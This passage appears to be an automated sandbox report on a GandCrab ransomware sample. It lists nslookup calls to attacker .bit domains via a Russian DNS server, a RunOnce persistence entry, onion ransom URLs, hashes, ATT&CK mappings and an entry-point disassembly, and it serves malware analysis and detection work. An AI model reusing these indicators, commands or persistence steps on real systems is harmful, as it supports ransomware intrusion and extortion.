Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00403A60 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

1_2_00403A60

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00408BC0 cpuid

1_2_00408BC0

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

1_2_00406D90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	2 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 File and Directory Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	44 System Information Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9gkAKTWOXp.exe	81%	Virustotal		Browse
9gkAKTWOXp.exe	73%	Metadefender		Browse
9gkAKTWOXp.exe	100%	ReversingLabs	Win32.Ransomware.GandCrab
9gkAKTWOXp.exe	100%	Avira	TR/Crypt.XPACK.Gen3
9gkAKTWOXp.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	100%	Avira	TR/Crypt.XPACK.Gen3
C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.0.vkspii.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.2.9gkAKTWOXp.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
13.2.vkspii.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
21.2.vkspii.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.0.9gkAKTWOXp.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
21.0.vkspii.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File

Domains

Source	Detection	Scanner	Label	Link
emsisoft.bit	0%	Virustotal		Browse
nomoreransom.bit	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de	100%	Avira URL Cloud	malware
http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de	100%	Avira URL Cloud	phishing
http://gdcbghvjyqy7jclk.onion/e644d32fec6144de	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
emsisoft.bit	unknown	unknown	true	0%, Virustotal, Browse	unknown
ipv4bot.whatismyipaddress.com	unknown	unknown	false		high
nomoreransom.bit	unknown	unknown	true	1%, Virustotal, Browse	unknown
gandcrab.bit	unknown	unknown	true		unknown
dns1.soprodns.ru	unknown	unknown	true		unknown
8.8.8.8.in-addr.arpa	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.torproject.org/	9gkAKTWOXp.exe, vkspii.exe.1.dr	false		high
http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	false		high
http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	false		high
http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	true	Avira URL Cloud: malware	unknown
http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	true	Avira URL Cloud: phishing	unknown
http://gdcbghvjyqy7jclk.onion/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	true	Avira URL Cloud: safe	unknown
http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de	9gkAKTWOXp.exe, vkspii.exe.1.dr	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694569
Start date and time:	2022-09-01 00:00:17 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9gkAKTWOXp.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@127/2@529/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 96.9%) Quality average: 84.4% Quality standard deviation: 23.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 44 Number of non-executed functions: 122
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.82.228.9, 20.82.154.241
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neus1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:01:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
00:01:22	API Interceptor	80x Sleep call for process: 9gkAKTWOXp.exe modified
00:01:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\9gkAKTWOXp.exe
File Type:	data
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	F97F9E17EAFDD0105A4E11BAFDE04B40
SHA1:	BA06A7ABE986A61B71889B80A6F9B02B22D40667
SHA-256:	4783424121E6C2F870DC931B374D20C62C764EDDC5769D2F536609ADC1226ABB
SHA-512:	778C4AAB55F6F0FE44DBC9A97F53B59EC8ED2E35901F77AFEBAEA57C738AD301412760709AB909B51335DDD7676CD8F8C1410C5751F2EF5CC74282BCD6C5F50E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Download File

Process:	C:\Users\user\Desktop\9gkAKTWOXp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75264
Entropy (8bit):	4.804275425971981
Encrypted:	false
SSDEEP:	1536:ugSeGDjtQhnwmmB0yjMqqUM2mr3IdE8mne0Avu5r++yy7CA7GcIaapavdv:uMSjOnrmBbMqqMmr3IdE8we0Avu5r++N
MD5:	551DA842D854798E9D42602EB420BD96
SHA1:	B44E2B41F17EC56135BE9ED3F545025078E912EC
SHA-256:	F54A4A6120B5236D4621F4D38F496E2025A352D19A191799DB53F38E60C9C7EA
SHA-512:	877A04DC6730634E59C9395291CE80AD4F049CA1C24AE7D064129AC5DE5F65A67A2F1FABA6486353CC2676D838CEB7C4C6018456A8B7AF7F2BB703FD6865489C
Malicious:	true
Yara Hits:	Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Joe Security Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: kevoreilly
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This @i...5m cannot be run in DOS mode....$.......AU@..4...4...4..Ce...4..Ce...4...f...4...4...4...L...4...4/.4...f...4...f...4...f...4..Rich.4..................PE..L...].vZ.............................J............@..........................`............@.................................p........@.......................P.......................................................................................text............................... ..`.rdata..............................@....data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.804368489925485
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9gkAKTWOXp.exe
File size:	75264
MD5:	74e135b472b7496b371ce3ba3acfeea8
SHA1:	b64fdd870ff28291b8347317a838a5fb210a6056
SHA256:	d093322a612760cb00ae6fb4c453851ba26f59f2e6a0920b5871a28bbddf9355
SHA512:	c7c3fc7db77b5d450b857917b4157c2e1d2dcc41e18e248e50139711a04ee9893be26679e969a769113349ef9122387333ec7fe57d4d84dc541a4c9f9e25300b
SSDEEP:	1536:kgSeGDjtQhnwmmB0yjMqqUM2mr3IdE8mne0Avu5r++yy7CA7GcIaapavdv:kMSjOnrmBbMqqMmr3IdE8we0Avu5r++N
TLSH:	787317053AE18133FAF2F9B265B869E1587B7E541B287ADF00E8043E19275E25D30B4F
File Content Preview:	MZ......................@...............................................!..L.!This ..^.:_m cannot be run in DOS mode....$.......AU@..4...4...4..Ce...4..Ce...4...f...4...4...4...L...4...4/..4...f...4...f...4...f...4..Rich.4..................PE..L...].vZ...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x404af0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A76065D [Sat Feb 3 18:58:37 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	40306b615af659fc1f93cfb121cc38d9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F7110ADC4ADh
push 00000000h
call dword ptr [00409168h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 5Ch
push esi
push 00000044h
lea eax, dword ptr [ebp-58h]
xorps xmm0, xmm0
push 00000000h
push eax
mov esi, ecx
movdqu dqword ptr [ebp-10h], xmm0
call 00007F7110AE0707h
mov eax, dword ptr [00412B0Ch]
add esp, 0Ch
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-1Ch], eax
mov eax, dword ptr [00412B08h]
or dword ptr [ebp-2Ch], 00000101h
mov dword ptr [ebp-20h], eax
xor eax, eax
mov word ptr [ebp-28h], ax
lea eax, dword ptr [ebp-10h]
push eax
lea eax, dword ptr [ebp-58h]
mov dword ptr [ebp-58h], 00000044h
push eax
push 00000000h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
push 00000000h
push esi
push 00000000h
call dword ptr [00409164h]
test eax, eax
jne 00007F7110ADC70Dh
call dword ptr [00409064h]
pop esi
mov esp, ebp
pop ebp
ret
push dword ptr [ebp-10h]
mov esi, dword ptr [0040910Ch]
call esi
push dword ptr [ebp-0Ch]
call esi
pop esi
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 10h
movq xmm0, qword ptr [0040FF2Ch]
mov al, byte ptr [0040FF34h]
push ebx
mov ebx, dword ptr [ebp+08h]

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10970	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xab0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8000	0x8000	False	0.439727783203125	data	5.762192122939682	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x9000	0x8600	False	0.26437150186567165	data	3.71703192533741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x12000	0x1000	0xc00	False	0.2613932291666667	data	3.15531156836296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
